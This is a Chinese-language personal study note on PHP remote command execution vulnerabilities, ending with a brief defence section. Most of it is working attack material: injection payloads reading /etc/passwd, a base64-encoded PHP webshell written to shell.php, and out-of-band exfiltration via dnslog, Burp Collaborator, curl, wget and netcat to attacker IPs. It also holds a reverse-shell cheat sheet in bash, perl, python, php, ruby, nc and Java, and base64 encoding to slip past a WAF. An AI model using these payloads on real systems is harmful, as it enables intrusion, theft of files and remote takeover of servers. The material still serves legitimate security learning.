学习远程命令执行漏洞笔记

目录

1.命令执行漏洞描述

2.命令执行漏洞危害

3.命令执行漏洞代码分析 

 4.命令执行漏洞攻击

4.1;（分号）

4.2| (管道符号)

4.3&(后台任务符号)

 4.4&&（逻辑与）

 4.5||（逻辑或）

 4.6`（反引号）

 4.7$(command) 命令替换

 4.8win 命令链接符

5.命令执行漏洞外通信技巧

5.1利用管道符号写入 SHELL

5.2dnslog

 burpsuite burpcollaborator 测试无回显

利用日志测试无回显

 netcat

​编辑6. 命令执行漏洞 nc 反弹 shell

7. 命令执行漏洞防御

 总结

                                                                                                                                                        ————穷且益坚，不坠青云之志

---

1.命令执行漏洞描述

程序员使用脚本语言(比如 PHP)开发应用程序过程中，脚本语言开发十分快速、 简洁，方便，但是也伴随着一些问题。比如说速度慢，或者无法接触系统底层， 如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序。当应 用需要调用一些外部程序时就会用到一些执行系统命令的函数。应用在调用这些 函数执行系统命令的时候，如果将用户的输入作为系统命令的参数拼接到命令行 中，在没有过滤用户的输入的情况下，就会造成命令执行漏洞。

相关函数 在 PHP 中可以调用外部程序的常见函数：

system(args) 有回显
passthru(args)(有回显)
exec(args) （回显最后一行-必须 echo 输出）
shell_exec(args) （无回显-必须输出）
反引号：`` popen(handle,mode)(无回显)
proc_open('cmd','flag','flag')（无回显）
$process = proc_open('dir',$des,$pipes);
echo stream_get_contents($pipes[1]);

2.命令执行漏洞危害

•  继承 Web 服务器程序的权限，去执行系统命令
•  继承 Web 服务器程序的权限，读写文件
•  反弹 shell
•  控制整个网站 
• 甚至控制整个服务器   

3.命令执行漏洞代码分析 

从代码中，ipaddress 参数是外部可以控制的，再判断类型，再使用 shell_exec 函 数调用系统命令，所以存在命令执行漏洞。

 4.命令执行漏洞攻击

4.1;（分号）

命令按照顺序（从左到右）被执行，并且可以用分号进行分隔。当有一条命令执 行失败时，不会中断其它命令的执行。

ping -c 1 127.0.0.1;whoami

命令执行漏洞可以直接使用&&或者|和管道命令执行其他命令 命令链接符号解析

4.2| (管道符号)

通过管理符 可以将一个命令的标准输出管理为另外一个命令的标准输入，当它 失败后，会执行另外一条命令

ping -c 1 127.0.0.1|whoami

4.3&(后台任务符号)

命令按照顺序（从左到右）被执行，跟分号作用一样；此符号作用是后台任务符 号使 shell 在后台执行该任务，这样用户就可以立即得到一个提示符并继续其他 工作

ping -c 4 127.0.0.1&cat /etc/passwd&

 4.4&&（逻辑与）

前后的命令的执行存在逻辑与关系，只有【&&】前面的命令执行成功后，它后 面的命令才被执行 ping -c 4 127.0.0.1&&whoami

 4.5||（逻辑或）

前后命令的执行存在逻辑或关系，只有【||】前面的命令执行失败后，它后面的 命令才被执行； ping -c ||whoami

 4.6`（反引号）

当一个命令被解析时，它首先会执行反引号之间的操作。例如执行 echo `ls -a` 将 会首先执行 ls 并捕获其输出信息。然后再将它传递给 echo，并将 ls 的输出结果 打印在屏幕上，这被称为命令替换 echo `whoami`

 4.7$(command) 命令替换

这是命令替换的不同符号。当反引号被过滤或编码时，可能会更有效。

ping -c 4 |echo $(whoami)

 4.8win 命令链接符

| & || && 跟 linux 一样 有回显的 发现命令执行漏洞，如果是回显的情况下，获取系统敏感信息。 win 操作系统

type c:\windows\win.ini

linux 操作系统

cat /etc/passwd

无回显 有回显的情况下相对交少，一般在实战环境环境中，无回显的环境较多，证明漏 洞存在就需要各种利用外通信技巧

5.命令执行漏洞外通信技巧

5.1利用管道符号写入 SHELL

如果存在漏洞的页面有 web 服务器，有权限写入，利用 shell 命令写入 webshell 后门到网站目录，访问即可获取 webshell

echo "PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk/Pg=="|base64 -d >shell.php

 带外通信技巧一般都是无回显的情况使用

5.2dnslog

dnslog 是一个显示解析记录的平台，在无回显的情况下，通过访问 dnslog，dnslog 会把你访问的子域名的头文件记录下来。

http://www.dnslog.cn/

 使用反引号`whoami`得到的用户名再，子域名，再使用 icmp 协议访问 ping 域名

ping -c 4 127.0.0.1| ping `whoami`.9t7w01.dnslog.cn

         

 如果存在漏洞得情况下 getsubdomin 就会得到回显得信息。

 burpsuite burpcollaborator 测试无回显

测试的原理和 dnslog 一样 使用 burpsuite 的 burpcollaborator 复制

 点击 copyt to clipboard 复制测试的子域名再拼接子域名

ping -c 4 127.0.0.1| ping `whoami`.569piqieuboa86avrm3hzxx57wdm1b.burpcollaborator.net

 Poll now 是刷新频率，如果有访问记录，会自动把请求记录下来，这个时候就能看到回显的 字符。

利用日志测试无回显

利用 HTTP 协议，访问 WEB 中间件时，iis 或者 apache 或者小型服务，都存在 访问日志。在 kali 上开启 python 的小型服务器。再用 curl 协议访问远程服务器 ip 的 80 端口，再到 kali 的终端查看记录即可。

使用 curl 命令

ping -c 4 ||curl http://192.168.0.133/?`whoami`

使用 wget 命令

ping -c 4 ||wget http://192.168.0.133/?`whoami`

 netcat

如果目标系统存在有 netcat 在 ubuntu 系统都会存在的。使用命令读取文件传递 到远程服务器上 远程服务器监听命令

nc -lp 9999 >passwd

本地执行命令

nc 192.168.1.53 9999 </etc/passwd

6. 命令执行漏洞 nc 反弹 shell

在执行命令漏洞，一般的利用方式是执行反弹 shell，再进行其他的操作。 执行反弹 shell 的命令有许多。

反弹 shell 因为是从受害者，反向连接远程服务器，请求是从内部到外部，所以 防火墙是不会进行拦截。

远程服务器 nc 监听命令:

nc -vlnp 8080

受害者反弹 shell 命令，每种语言都有 sock 连接命令，可以根据不同的环境，选 择合适的命令。

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

使用 bash shell 执行

||/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.124/8080 0>&1'

perl -e 'use

Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(
"tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STD
OUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.co
nnect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i
<&%d >&%d 2>&%d",f,f,f)'

nc -e /bin/sh 10.0.0.1 1234

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line;
do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

如果有 waf 进行连接，可以把语句进行 base64 加密后，因为加密后的字符串没 有触发拦截规则，再利用 shell 命令再进行解码。

bash -i >& /dev/tcp/192.168.0.103/8080 0>&1

base64 编码后

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTAzLzgwODAgMD4mMQ ==

受害者执行

echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTMzLzgwODAgMD4mM Q=="|base64 -d|bash

远程服务器监听

7. 命令执行漏洞防御

• 不执行外部的应用程序或命令 尽量使用自定义函数或函数库实现外部应用程序或命令的功能。在执行 system、 eval 等命令执行功能的函数前，要确认参数内容。
• 使用 escapeshellarg 函数处理相关参数 escapeshellarg 函数会将用户引起参数或命令结束的字符进行转义，如单引号“’” 会被转义为“’”，双引号“"”会被转义为“"”，分号“;”会被转义为“;”， 这样 escapeshellarg 会将参数内容限制在一对单引号或双引号里面，转义参数中 包括的单引号或双引号，使其无法对当前执行进行截断，实现防范命令注入攻击 的目的。
• 使用 safe_mode_exec_dir 执行可执行的文件路径 将 php.ini 文件中的 safe_mode 设置为 On，然后将允许执行的文件放入一个目录， 并使用 safe_mode_exec_dir 指定这个可执行的文件路径。这样，在需要执行相应 的外部程序时，程序必须在 safe_mode_exec_dir 指定的目录中才会允许执行，否 则执行将失败。

 总结

以上是我学习完远程命令执行漏洞的学习心得和笔记，望自己能坚持下去。

                                                                                                                                                        ————穷且益坚，不坠青云之志